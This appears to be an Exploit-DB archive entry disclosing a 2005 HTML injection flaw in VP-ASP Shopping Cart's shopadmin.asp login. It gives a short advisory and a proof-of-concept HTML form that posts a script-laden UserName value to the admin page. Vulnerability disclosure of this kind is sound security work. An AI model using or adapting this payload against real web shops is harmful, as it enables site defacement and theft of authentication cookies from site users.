Lucene search

K
exploitdbConcorDHacKEDB-ID:26537
HistoryNov 17, 2005 - 12:00 a.m.

VP-ASP Shopping Cart - 'Shopadmin.asp' HTML Injection

2005-11-1700:00:00
ConcorDHacK
www.exploit-db.com
280

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/15490/info

VP-ASP Shopping Cart is prone to an HTML injection vulnerability. This is due to a lack of proper validation of user-supplied input before being used in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. 

<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By [email protected]>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: [email protected]<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML> 

AI Score

7.4

Confidence

Low

Related for EDB-ID:26537